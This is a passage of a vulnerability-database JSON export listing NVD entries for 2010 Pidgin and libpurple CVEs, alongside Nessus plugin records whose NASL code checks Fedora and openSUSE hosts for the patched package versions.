"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:50", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "http://www.openwall.com/lists/oss-security/2010/01/07/2", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://blogs.sun.com/security/entry/cve_2010_0277_malformed_msn", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "http://pidgin.im/news/security/?id=43", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.vupen.com/english/advisories/2010/2693", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "https://bugzilla.redhat.com/show_bug.cgi?id=554335", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://events.ccc.de/congress/2009/Fahrplan/events/3596.en.html"], "description": "slp.c in the MSN protocol plugin in libpurple in Pidgin before 2.6.6, including 2.6.4, and Adium 1.3.8 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed MSNSLP INVITE request in an SLP message, a different issue than CVE-2010-0013.", "edition": 2, "reporter": "NVD", "published": "2010-01-09T13:30:01", "title": "CVE-2010-0277", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:50", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:18348", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18348"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0277"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9421", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9421"}], "modified": "2017-09-18T21:30:21", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:adium:adium:1.3.8", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0277", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0277", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:51", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "https://bugzilla.redhat.com/show_bug.cgi?id=565792", "http://www.vupen.com/english/advisories/2010/0914", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56394", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://pidgin.im/news/security/?id=45", "http://www.debian.org/security/2010/dsa-2038"], "description": "gtkimhtml.c in Pidgin before 2.6.6 allows remote attackers to cause a denial of service (CPU consumption and application hang) by sending many smileys in a (1) IM or (2) chat.", "edition": 3, "reporter": "NVD", "published": "2010-02-24T13:30:00", "title": "CVE-2010-0423", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:17554", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A17554"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0423"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9842", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9842"}], "modified": "2017-09-18T21:30:23", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0423", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0423", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:51", "references": ["http://www.ubuntu.com/usn/USN-902-1", "http://www.vupen.com/english/advisories/2010/0413", "http://www.securityfocus.com/bid/38294", "http://pidgin.im/news/security/?id=44", "http://www.vupen.com/english/advisories/2010/0914", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035409.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035347.html", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://developer.pidgin.im/wiki/ChangeLog", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56399", "http://www.vupen.com/english/advisories/2010/1020", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html", "https://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:041", "https://bugzilla.redhat.com/show_bug.cgi?id=565786", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://www.debian.org/security/2010/dsa-2038"], "description": "libpurple in Finch in Pidgin before 2.6.6, when an XMPP multi-user chat (MUC) room is used, does not properly parse nicknames containing <br> sequences, which allows remote attackers to cause a denial of service (application crash) via a crafted nickname.", "edition": 3, "reporter": "NVD", "published": "2010-02-24T13:30:00", "title": "CVE-2010-0420", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11485", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11485"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0420"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11485", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11485"}], "modified": "2017-09-18T21:30:23", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.9", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.6.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.6.5", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.6.1", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:pidgin:pidgin:2.6.0", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.6.2", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2010-0420", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0420", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:49", "references": ["http://d.pidgin.im/viewmtn/revision/info/c64a1adc8bda2b4aeaae1f273541afbc4f71b810", "http://lists.fedoraproject.org/pipermail/package-announce/2010-January/033848.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-January/033771.html", "http://www.openwall.com/lists/oss-security/2010/01/07/2", "http://sunsolve.sun.com/search/document.do?assetkey=1-66-277450-1", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html", "http://www.vupen.com/english/advisories/2009/3662", "http://d.pidgin.im/viewmtn/revision/info/3d02401cf232459fc80c0837d31e05fae7ae5467", "http://developer.pidgin.im/viewmtn/revision/diff/3d02401cf232459fc80c0837d31e05fae7ae5467/with/c64a1adc8bda2b4aeaae1f273541afbc4f71b810/libpurple/protocols/msn/slp.c", "http://www.openwall.com/lists/oss-security/2010/01/02/1", "https://bugzilla.redhat.com/show_bug.cgi?id=552483", "http://d.pidgin.im/viewmtn/revision/info/4be2df4f72bd8a55cdae7f2554b73342a497c92f", "http://www.vupen.com/english/advisories/2009/3663", "http://www.openwall.com/lists/oss-security/2010/01/07/1", "http://sunsolve.sun.com/search/document.do?assetkey=1-77-1022203.1-1", "http://www.vupen.com/english/advisories/2010/1020", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:085", "http://events.ccc.de/congress/2009/Fahrplan/events/3596.en.html"], "description": "Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon.", "edition": 2, "reporter": "NVD", "published": "2010-01-09T13:30:01", "title": "CVE-2010-0013", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:49", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10333", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10333"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0013"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10333", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10333"}], "modified": "2017-09-18T21:30:09", "cpe": ["cpe:/a:adium:adium:1.3.8", "cpe:/a:pidgin:pidgin:2.6.4"], "id": "CVE-2010-0013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0013", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-02T00:00:04", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=565792", "https://bugzilla.redhat.com/show_bug.cgi?id=565786", "https://bugzilla.redhat.com/show_bug.cgi?id=554335", "http://www.nessus.org/u?d8db0720"], "pluginID": "47244", "description": "2.6.6 with security and numerous minor bug fixes CVE-2010-0277 CVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "title": "Fedora 11 : pidgin-2.6.6-1.fc11 (2010-1279)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2009-2694", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:pidgin"], "id": "FEDORA_2010-1279.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47244", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1279.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47244);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2009-2694\", \"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(36071, 36277, 37524, 38294);\n script_xref(name:\"FEDORA\", value:\"2010-1279\");\n\n script_name(english:\"Fedora 11 : pidgin-2.6.6-1.fc11 (2010-1279)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"2.6.6 with security and numerous minor bug fixes CVE-2010-0277\nCVE-2010-0420 CVE-2010-0423\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=554335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=565792\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-February/035332.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d8db0720\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"pidgin-2.6.6-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:00:43", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=567799", "https://bugzilla.novell.com/show_bug.cgi?id=569616"], "pluginID": "44982", "description": "This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal (CWE-22) Remote file disclosure vulnerability by using the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource Management Errors (CWE-399) MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it.", "edition": 5, "reporter": "Tenable", "published": "2010-03-04T00:00:00", "title": "openSUSE Security Update : finch (finch-2032)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:finch", "p-cpe:/a:novell:opensuse:finch-devel", "p-cpe:/a:novell:opensuse:libpurple-meanwhile", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:libpurple-tcl", "p-cpe:/a:novell:opensuse:libpurple-lang", "p-cpe:/a:novell:opensuse:pidgin-devel", "p-cpe:/a:novell:opensuse:libpurple-mono", "p-cpe:/a:novell:opensuse:pidgin", "p-cpe:/a:novell:opensuse:libpurple", "p-cpe:/a:novell:opensuse:libpurple-devel"], "id": "SUSE_11_2_FINCH-100219.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44982", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update finch-2032.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44982);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"openSUSE Security Update : finch (finch-2032)\");\n script_summary(english:\"Check for the finch-2032 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal\n (CWE-22) Remote file disclosure vulnerability by using\n the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource\n Management Errors (CWE-399) MSN protocol plugin in\n libpurple allowed remote attackers to cause a denial of\n service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a\n crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack\n (resource consumption) is possible by sending an IM with\n a lot of smilies in it.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=567799\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569616\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected finch packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(20, 22, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-meanwhile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-mono\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"finch-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"finch-devel-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-devel-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-lang-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-meanwhile-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-mono-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"libpurple-tcl-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"pidgin-2.6.6-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"pidgin-devel-2.6.6-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pidgin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:41:00", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=567799", "https://bugzilla.novell.com/show_bug.cgi?id=569616"], "pluginID": "44979", "description": "This update of pidgin fixes various security vulnerabilities\n\n - CVE-2010-0013: CVSS v2 Base Score: 4.3: Path Traversal (CWE-22) Remote file disclosure vulnerability by using the MSN protocol.\n\n - CVE-2010-0277: CVSS v2 Base Score: 4.9: Resource Management Errors (CWE-399) MSN protocol plugin in libpurple allowed remote attackers to cause a denial of service (memory corruption) at least.\n\n - CVE-2010-0420 Same nick names in XMPP MUC lead to a crash in finch.\n\n - CVE-2010-0423 A remote denial of service attack (resource consumption) is possible by sending an IM with a lot of smilies in it.", "edition": 5, "reporter": "Tenable", "published": "2010-03-04T00:00:00", "title": "openSUSE Security Update : finch (finch-2032)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:finch", "p-cpe:/a:novell:opensuse:finch-devel", "p-cpe:/a:novell:opensuse:libpurple-meanwhile", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libpurple-lang", "p-cpe:/a:novell:opensuse:pidgin-devel", "p-cpe:/a:novell:opensuse:libpurple-mono", "p-cpe:/a:novell:opensuse:pidgin", "p-cpe:/a:novell:opensuse:libpurple", "p-cpe:/a:novell:opensuse:libpurple-devel"], "id": "SUSE_11_1_FINCH-100219.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44979", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update finch-2032.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44979);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:51 $\");\n\n script_cve_id(\"CVE-2010-0013\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n\n script_name(english:\"openSUSE Security Update : finch (finch-2032)\");\n script_summary(english:\"Check for the finch-2032 patch\");\n\n 